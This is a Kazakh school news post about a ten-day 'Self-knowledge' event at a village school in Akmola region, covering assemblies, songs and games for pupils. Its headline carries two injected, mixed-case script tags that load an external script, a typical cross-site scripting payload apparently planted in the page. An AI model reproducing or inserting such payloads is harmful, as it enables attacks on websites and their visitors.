«Өзін- өзі тану : Сүйіспеншілік пен Шығармашылық педагогикасы» онкүндігі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.02.2022

                Ақпанның бірінші жұлдызында «Ақмола облысы білім басқармасының  Егіндікөл  ауданы бойынша білім бөлімі Көркем  ауылының негізгі  орта білім беретін мектебі» коммуналдық мемлекеттік мекемесінде  «Өзін- өзі тану» бойынша онкүндік басталды. Мектеп қабырғасында оқып жүрген  сыныптар арасында салтанатты жиын өтті  .Салтанатты жиын бастауыш мен орта және жоғары сыныптары үшін жеке ұйымдастырылды. 
      Бұл салтанатты жиынның мақсаты: оқушылардың бойындағы ізгі рухани адамгершілік қасиеттері туралы түсініктерін кеңейте отырып, сүйіспеншілік, дұрыс әрекет құндылықтарының мәнін ашу. Осы мақсатты негізге ала отырып , оқушылар мағыналы тақпақтар мен жылы сөздер айтты, тақырыпқа сай әндер шырқалып, тренинг жаттығу да өткізілді. 
    Бастауыш буында да бұл мереке өте қызықты өтті. Өзін - өзі  тану   мұғалімі   Муканова  Р.Ж -қызы басталған апталықтың маңыздылығын, берер өнеге, тәрбиесін кішкентай бүлдіршіндерге ойындар арқылы түсіндіре білді. 
    Балалар бұл мерекелік іс -шараға жауапкершілікпен дайындалып, ұйымдастыруда белсенділік танытты.

Просмотров: 553


Пікір қосу



Деректерді қолтаңбаға қосу